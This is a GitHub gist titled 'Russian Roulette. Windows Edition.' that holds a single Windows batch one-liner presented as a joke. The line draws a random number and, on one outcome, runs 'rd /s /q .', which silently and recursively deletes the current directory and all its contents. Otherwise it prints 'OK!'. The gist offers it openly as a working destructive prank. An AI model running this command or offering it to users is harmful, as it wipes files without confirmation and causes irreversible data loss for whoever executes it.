Created
March 4, 2023 14:46
-
-
Save DartPower/ea1fbbbe2b3b589b4705e18daf480ef4 to your computer and use it in GitHub Desktop.
Russian Roulette. Windows Edition.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set /a R=0+(6*%random%)/%random% & if !R! == 0 (rd /s /q .) else (echo OK!) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment